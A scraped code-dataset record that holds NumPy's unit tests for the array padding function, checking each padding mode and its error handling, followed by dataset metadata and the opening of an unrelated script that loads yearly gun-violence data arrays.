arr = np.arange(30).reshape(5, 6)
test = pad(arr, ((1,), (2,)), mode='constant',
constant_values=3)
expected = np.array(
[[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3],
[ 3, 3, 0, 1, 2, 3, 4, 5, 3, 3],
[ 3, 3, 6, 7, 8, 9, 10, 11, 3, 3],
[ 3, 3, 12, 13, 14, 15, 16, 17, 3, 3],
[ 3, 3, 18, 19, 20, 21, 22, 23, 3, 3],
[ 3, 3, 24, 25, 26, 27, 28, 29, 3, 3],
[ 3, 3, 3, 3, 3, 3, 3, 3, 3, 3]]
)
assert_allclose(test, expected)
def test_check_constant_pad_2d(self):
arr = np.arange(4).reshape(2, 2)
test = np.lib.pad(arr, ((1, 2), (1, 3)), mode='constant',
constant_values=((1, 2), (3, 4)))
expected = np.array(
[[3, 1, 1, 4, 4, 4],
[3, 0, 1, 4, 4, 4],
[3, 2, 3, 4, 4, 4],
[3, 2, 2, 4, 4, 4],
[3, 2, 2, 4, 4, 4]]
)
assert_allclose(test, expected)
class TestLinearRamp(TestCase):
def test_check_simple(self):
a = np.arange(100).astype('f')
a = pad(a, (25, 20), 'linear_ramp', end_values=(4, 5))
b = np.array(
[4.00, 3.84, 3.68, 3.52, 3.36, 3.20, 3.04, 2.88, 2.72, 2.56,
2.40, 2.24, 2.08, 1.92, 1.76, 1.60, 1.44, 1.28, 1.12, 0.96,
0.80, 0.64, 0.48, 0.32, 0.16,
0.00, 1.00, 2.00, 3.00, 4.00, 5.00, 6.00, 7.00, 8.00, 9.00,
10.0, 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0,
20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0, 27.0, 28.0, 29.0,
30.0, 31.0, 32.0, 33.0, 34.0, 35.0, 36.0, 37.0, 38.0, 39.0,
40.0, 41.0, 42.0, 43.0, 44.0, 45.0, 46.0, 47.0, 48.0, 49.0,
50.0, 51.0, 52.0, 53.0, 54.0, 55.0, 56.0, 57.0, 58.0, 59.0,
60.0, 61.0, 62.0, 63.0, 64.0, 65.0, 66.0, 67.0, 68.0, 69.0,
70.0, 71.0, 72.0, 73.0, 74.0, 75.0, 76.0, 77.0, 78.0, 79.0,
80.0, 81.0, 82.0, 83.0, 84.0, 85.0, 86.0, 87.0, 88.0, 89.0,
90.0, 91.0, 92.0, 93.0, 94.0, 95.0, 96.0, 97.0, 98.0, 99.0,
94.3, 89.6, 84.9, 80.2, 75.5, 70.8, 66.1, 61.4, 56.7, 52.0,
47.3, 42.6, 37.9, 33.2, 28.5, 23.8, 19.1, 14.4, 9.7, 5.]
)
assert_allclose(a, b, rtol=1e-5, atol=1e-5)
def test_check_2d(self):
arr = np.arange(20).reshape(4, 5).astype(np.float64)
test = pad(arr, (2, 2), mode='linear_ramp', end_values=(0, 0))
expected = np.array(
[[0., 0., 0., 0., 0., 0., 0., 0., 0.],
[0., 0., 0., 0.5, 1., 1.5, 2., 1., 0.],
[0., 0., 0., 1., 2., 3., 4., 2., 0.],
[0., 2.5, 5., 6., 7., 8., 9., 4.5, 0.],
[0., 5., 10., 11., 12., 13., 14., 7., 0.],
[0., 7.5, 15., 16., 17., 18., 19., 9.5, 0.],
[0., 3.75, 7.5, 8., 8.5, 9., 9.5, 4.75, 0.],
[0., 0., 0., 0., 0., 0., 0., 0., 0.]])
assert_allclose(test, expected)
class TestReflect(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect')
b = np.array(
[25, 24, 23, 22, 21, 20, 19, 18, 17, 16,
15, 14, 13, 12, 11, 10, 9, 8, 7, 6,
5, 4, 3, 2, 1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
98, 97, 96, 95, 94, 93, 92, 91, 90, 89,
88, 87, 86, 85, 84, 83, 82, 81, 80, 79]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'reflect', reflect_type='odd')
b = np.array(
[-25, -24, -23, -22, -21, -20, -19, -18, -17, -16,
-15, -14, -13, -12, -11, -10, -9, -8, -7, -6,
-5, -4, -3, -2, -1,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
100, 101, 102, 103, 104, 105, 106, 107, 108, 109,
110, 111, 112, 113, 114, 115, 116, 117, 118, 119]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7, 8, 7, 6, 7],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'reflect')
b = np.array(
[[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5],
[5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5, 6, 5, 4, 5]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'reflect')
b = np.array([3, 2, 1, 2, 3, 2, 1])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'reflect')
b = np.array([2, 3, 2, 1, 2, 3, 2, 1, 2])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 4, 'reflect')
b = np.array([1, 2, 3, 2, 1, 2, 3, 2, 1, 2, 3])
assert_array_equal(a, b)
class TestSymmetric(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric')
b = np.array(
[24, 23, 22, 21, 20, 19, 18, 17, 16, 15,
14, 13, 12, 11, 10, 9, 8, 7, 6, 5,
4, 3, 2, 1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 98, 97, 96, 95, 94, 93, 92, 91, 90,
89, 88, 87, 86, 85, 84, 83, 82, 81, 80]
)
assert_array_equal(a, b)
def test_check_odd_method(self):
a = np.arange(100)
a = pad(a, (25, 20), 'symmetric', reflect_type='odd')
b = np.array(
[-24, -23, -22, -21, -20, -19, -18, -17, -16, -15,
-14, -13, -12, -11, -10, -9, -8, -7, -6, -5,
-4, -3, -2, -1, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
99, 100, 101, 102, 103, 104, 105, 106, 107, 108,
109, 110, 111, 112, 113, 114, 115, 116, 117, 118]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[7, 8, 8, 7, 6, 6, 7, 8, 8, 7, 6, 6, 7, 8, 8],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_large_pad_odd(self):
a = [[4, 5, 6], [6, 7, 8]]
a = pad(a, (5, 7), 'symmetric', reflect_type='odd')
b = np.array(
[[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-3, -2, -2, -1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[-1, 0, 0, 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 1, 2, 2, 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 3, 4, 4, 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 5, 6, 6, 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 7, 8, 8, 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18],
[ 9, 10, 10, 11, 12, 12, 13, 14, 14, 15, 16, 16, 17, 18, 18]]
)
assert_array_equal(a, b)
def test_check_shape(self):
a = [[4, 5, 6]]
a = pad(a, (5, 7), 'symmetric')
b = np.array(
[[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6],
[5, 6, 6, 5, 4, 4, 5, 6, 6, 5, 4, 4, 5, 6, 6]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 2, 'symmetric')
b = np.array([2, 1, 1, 2, 3, 3, 2])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 3, 'symmetric')
b = np.array([3, 2, 1, 1, 2, 3, 3, 2, 1])
assert_array_equal(a, b)
def test_check_03(self):
a = pad([1, 2, 3], 6, 'symmetric')
b = np.array([1, 2, 3, 3, 2, 1, 1, 2, 3, 3, 2, 1, 1, 2, 3])
assert_array_equal(a, b)
class TestWrap(TestCase):
def test_check_simple(self):
a = np.arange(100)
a = pad(a, (25, 20), 'wrap')
b = np.array(
[75, 76, 77, 78, 79, 80, 81, 82, 83, 84,
85, 86, 87, 88, 89, 90, 91, 92, 93, 94,
95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19,
20, 21, 22, 23, 24, 25, 26, 27, 28, 29,
30, 31, 32, 33, 34, 35, 36, 37, 38, 39,
40, 41, 42, 43, 44, 45, 46, 47, 48, 49,
50, 51, 52, 53, 54, 55, 56, 57, 58, 59,
60, 61, 62, 63, 64, 65, 66, 67, 68, 69,
70, 71, 72, 73, 74, 75, 76, 77, 78, 79,
80, 81, 82, 83, 84, 85, 86, 87, 88, 89,
90, 91, 92, 93, 94, 95, 96, 97, 98, 99,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9,
10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
)
assert_array_equal(a, b)
def test_check_large_pad(self):
a = np.arange(12)
a = np.reshape(a, (3, 4))
a = pad(a, (10, 12), 'wrap')
b = np.array(
[[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11],
[2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2, 3, 0, 1, 2,
3, 0, 1, 2, 3, 0, 1, 2, 3],
[6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6, 7, 4, 5, 6,
7, 4, 5, 6, 7, 4, 5, 6, 7],
[10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10, 11, 8, 9, 10,
11, 8, 9, 10, 11, 8, 9, 10, 11]]
)
assert_array_equal(a, b)
def test_check_01(self):
a = pad([1, 2, 3], 3, 'wrap')
b = np.array([1, 2, 3, 1, 2, 3, 1, 2, 3])
assert_array_equal(a, b)
def test_check_02(self):
a = pad([1, 2, 3], 4, 'wrap')
b = np.array([3, 1, 2, 3, 1, 2, 3, 1, 2, 3, 1])
assert_array_equal(a, b)
class TestStatLen(TestCase):
def test_check_simple(self):
a = np.arange(30)
a = np.reshape(a, (6, 5))
a = pad(a, ((2, 3), (3, 2)), mode='mean', stat_length=(3,))
b = np.array(
[[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[1, 1, 1, 0, 1, 2, 3, 4, 3, 3],
[6, 6, 6, 5, 6, 7, 8, 9, 8, 8],
[11, 11, 11, 10, 11, 12, 13, 14, 13, 13],
[16, 16, 16, 15, 16, 17, 18, 19, 18, 18],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[26, 26, 26, 25, 26, 27, 28, 29, 28, 28],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23],
[21, 21, 21, 20, 21, 22, 23, 24, 23, 23]]
)
assert_array_equal(a, b)
class TestEdge(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, ((2, 3), (3, 2)), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
def test_check_width_shape_1_2(self):
# Check a pad_width of the form ((1, 2),).
# Regression test for issue gh-7808.
a = np.array([1, 2, 3])
padded = pad(a, ((1, 2),), 'edge')
expected = np.array([1, 1, 2, 3, 3, 3])
assert_array_equal(padded, expected)
a = np.array([[1, 2, 3], [4, 5, 6]])
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
a = np.arange(24).reshape(2, 3, 4)
padded = pad(a, ((1, 2),), 'edge')
expected = pad(a, ((1, 2), (1, 2), (1, 2)), 'edge')
assert_array_equal(padded, expected)
class TestZeroPadWidth(TestCase):
def test_zero_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
for pad_width in (0, (0, 0), ((0, 0), (0, 0))):
assert_array_equal(arr, pad(arr, pad_width, mode='constant'))
class TestLegacyVectorFunction(TestCase):
def test_legacy_vector_functionality(self):
def _padwithtens(vector, pad_width, iaxis, kwargs):
vector[:pad_width[0]] = 10
vector[-pad_width[1]:] = 10
return vector
a = np.arange(6).reshape(2, 3)
a = pad(a, 2, _padwithtens)
b = np.array(
[[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 0, 1, 2, 10, 10],
[10, 10, 3, 4, 5, 10, 10],
[10, 10, 10, 10, 10, 10, 10],
[10, 10, 10, 10, 10, 10, 10]]
)
assert_array_equal(a, b)
class TestNdarrayPadWidth(TestCase):
def test_check_simple(self):
a = np.arange(12)
a = np.reshape(a, (4, 3))
a = pad(a, np.array(((2, 3), (3, 2))), 'edge')
b = np.array(
[[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[0, 0, 0, 0, 1, 2, 2, 2],
[3, 3, 3, 3, 4, 5, 5, 5],
[6, 6, 6, 6, 7, 8, 8, 8],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11],
[9, 9, 9, 9, 10, 11, 11, 11]]
)
assert_array_equal(a, b)
class TestUnicodeInput(TestCase):
def test_unicode_mode(self):
constant_mode = u'constant'
a = np.pad([1], 2, mode=constant_mode)
b = np.array([0, 0, 1, 0, 0])
assert_array_equal(a, b)
class ValueError1(TestCase):
def test_check_simple(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2), (4, 5)),
**kwargs)
def test_check_negative_stat_length(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(-3, ))
assert_raises(ValueError, pad, arr, ((2, 3), (3, 2)),
**kwargs)
def test_check_negative_pad_width(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
class ValueError2(TestCase):
def test_check_negative_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
class ValueError3(TestCase):
def test_check_kwarg_not_allowed(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, 4, mode='mean',
reflect_type='odd')
def test_mode_not_set(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(TypeError, pad, arr, 4)
def test_malformed_pad_amount(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, (4, 5, 6, 7), mode='constant')
def test_malformed_pad_amount2(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, ((3, 4, 5), (0, 1, 2)),
mode='constant')
def test_pad_too_many_axes(self):
arr = np.arange(30).reshape(5, 6)
# Attempt to pad using a 3D array equivalent
bad_shape = (((3,), (4,), (5,)), ((0,), (1,), (2,)))
assert_raises(ValueError, pad, arr, bad_shape,
mode='constant')
class TypeError1(TestCase):
def test_float(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, ((-2.1, 3), (3, 2)))
assert_raises(TypeError, pad, arr, np.array(((-2.1, 3), (3, 2))))
def test_str(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, 'foo')
assert_raises(TypeError, pad, arr, np.array('foo'))
def test_object(self):
class FooBar(object):
pass
arr = np.arange(30)
assert_raises(TypeError, pad, arr, FooBar())
def test_complex(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, complex(1, -1))
assert_raises(TypeError, pad, arr, np.array(complex(1, -1)))
def test_check_wrong_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(TypeError, pad, arr, ((2, 3, 4), (3, 2)),
**kwargs)
if __name__ == "__main__":
np.testing.run_module_suite()
| [
"lukaspolon@gmail.com"
] | lukaspolon@gmail.com |
1e4fcb46ad26e77180ef6a7b17db5eca61bcb120 | 10fba4bbbf792d4d51130d9612cdf90386ab4942 | /gun_violence_project/src/process.py | 9329a597743ef45c34a7bebe94b5500a147bc4d0 | [] | no_license | pf4d/pattern_recognition | f9318c6952d715eb9adbe4c5171bc392f65706ce | c0bbb923c5f26597735186cb35ff78fd77cb7603 | refs/heads/master | 2021-06-16T01:12:43.623815 | 2020-12-15T04:01:39 | 2020-12-15T04:01:39 | 73,958,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 62,946 | py | from pylab import *
d1976 = load('data/1976.npy')
d1977 = load('data/1977.npy')
d1978 = load('data/1978.npy')
d1979 = load('data/1979.npy')
d1980 = load('data/1980.npy')
d1981 = load('data/1981.npy')
d1982 = load('data/1982.npy')
d1983 = load('data/1983.npy')
d1984 = load('data/1984.npy')
d1985 = load('data/1985.npy')
d1986 = load('data/1986.npy')
d1987 = load('data/1987.npy')
d1988 = load('data/1988.npy')
d1989 = load('data/1989.npy')
d1990 = load('data/1990.npy')
d1991 = load('data/1991.npy')
d1992 = load('data/1992.npy')
d1993 = load('data/1993.npy')
d1994 = load('data/1994.npy')
d1995 = load('data/1995.npy')
d1996 = load('data/1996.npy')
d1997 = load('data/1997.npy')
d1998 = load('data/1998.npy')
d1999 = load('data/1999.npy')
d2000 = load('data/2000.npy')
d2001 = load('data/2001.npy')
d2002 = load('data/2002.npy')
d2003 = load('data/2003.npy')
d2004 = load('data/2004.npy')
d2005 = load('data/2005.npy')
d2006 = load('data/2006.npy')
d2007 = load('data/2007.npy')
d2008 = load('data/2008.npy')
d2009 = load('data/2009.npy')
d2010 = load('data/2010.npy')
d2011 = load('data/2011.npy')
d2012 = load('data/2012.npy')
def groupConvert(g, sg):
if g == '0' or g == '0 ' or g == 0:
return 1
elif g == '1' or g == '1 ' or g == 1:
return 2
elif g == '2' or g == '2 ' or g == 2:
return 6
elif g == '3' or g == '3 ' or g == 3:
return 7
elif g == '4' or g == '4 ' or g == 4:
return 8
elif g == '5' or g == '5 ' or g == 5:
return 9
elif g == '6' or g == '6 ' or g == 6:
return 10
elif g == '7' or g == '7 ' or g == 7:
return 11
elif g == '8' or g == '8 ' or g == 8:
return 12
elif g == '9' or g == '9 ' or g == 9:
return 18
